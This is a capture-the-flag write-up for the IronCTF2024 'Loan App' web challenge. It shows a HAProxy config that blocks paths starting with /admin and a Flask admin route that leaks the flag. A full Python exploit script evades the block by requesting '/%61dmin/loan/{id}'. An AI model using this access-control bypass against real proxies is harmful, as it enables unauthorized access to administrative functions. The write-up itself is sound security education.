IronCTF2024 | Loan App - ByteTheCookies

Introduction#

This is the challenge web with the most solutions, which I must say is very nice, my solution is the unintended but also the most common one, in fact the correct approach would have been to do ‘request smuggling’, which is a much more complex attack to bypass the proxy, which in this case consists of splitting a request between proxy and backend.

Solve intended: Something like this

Source#

We focus on the proxy config

1
global
2
    log stdout format raw local0
3
    maxconn 2000
4
    user root
5
    group root
6
    daemon
7

8
defaults
9
    log global
10
    option httplog
11
    timeout client 30s
12
    timeout server 30s
13
    timeout connect 30s
14

15
frontend http_front
16
    mode http
17
    bind :80
18
    acl is_admin path_beg /admin # Miss config
19
    http-request deny if is_admin # Miss config
20
    default_backend gunicorn
21

22
backend gunicorn
23
    mode http
24
    balance roundrobin
25
    server loanserver loanapp:8000 maxconn 32

And win function

1
@app.route('/admin/loan/<loan_id>', methods=['POST'])
2
def admin_approve_loan(loan_id):
3
    try:
4
        mongo.db.loan.update_one({'_id': ObjectId(loan_id)}, {'$set': {'status': 'approved', 'message': FLAG}})
5
        return 'OK', 200
6
    except:
7
        return 'Internal Server Error', 500

Comments added by me

Solution#

The solution is very simple: just read the source code, register and login, and create a loan. Once this is done, thanks to the /admin/loan/id endpoint, the loan is approved by setting the flag

Exploit#

1
#!/usr/bin/python3
2

3
import http
4
import requests
5
from uuid import uuid4
6
from bs4 import BeautifulSoup
7
import urllib3.util
8

9
BASE_URL = "http://loanapp.1nf1n1ty.team/"
10
s = requests.Session()
11

12
def login(username,password):
13
  r = s.post(BASE_URL + "login", data={"username": username, "password": password})
14
  if r.status_code == 200:
15
    print("[+] Login successful")
16
  else:
17
    print("[-] Login failed: " + r.text)
18
    exit(1)
19

20
def register(username,password):
21
  r = s.post(BASE_URL + "register",data={"username": username, "password": password})
22
  if r.status_code == 200:
23
    print("[+] Registration successful")
24
  else:
25
    print("[-] Registration failed: " + r.text)
26
    exit(1)
27

28

29
def loan_request():
30
  r = s.post(BASE_URL + "loan-request", data={"amount": "696969696969696969", "reason": "I need money for cookies"})
31
  if r.status_code == 200:
32
    print("[+] Loan request successful")
33
  else:
34
    print("[-] Loan request failed: " + r.text)
35
    exit(1)
36

37
def get_loan_id():
38
  r = s.get(BASE_URL)
39
  soup = BeautifulSoup(r.text, 'html.parser')
40
  loan_id = soup.find("span", attrs={"class":"loan-id"}).text.strip().split(": ")[1]
41
  return loan_id
42

43
def exploit(loan_id):
44
  conn = http.client.HTTPConnection(urllib3.util.parse_url(BASE_URL).host)
45
  conn.request("POST", f"/%61dmin/loan/{loan_id}") # Use http instead of requests for avoid auto url encoding of requests
46
  response = conn.getresponse()
47
  if response.status != 200:
48
    print("[-] Exploit failed")
49
    exit(1)
50

51
def get_flag():
52
  r = s.get(BASE_URL)
53
  soup = BeautifulSoup(r.text, 'html.parser')
54
  return soup.find("p", attrs={"class": "loan-message"}).text.strip()[7:]
55

56
def main():
57
  username, password = uuid4(), uuid4()
58
  print(f"Username: {username} Password: {password}")
59
  register(username,password)
60
  login(username,password)
61
  loan_request()
62
  loan_id = get_loan_id()
63
  print(f"[+] Loan ID: {loan_id}")
64
  exploit(loan_id)
65
  print(f"[+] Flag: {get_flag()}")
66

67

68
if __name__ == "__main__":
69
  main()
70

71
# goodluck by @akiidjk

flag: ironCTF{L04n_4ppr0v3d_f0r_H4ck3r$!!}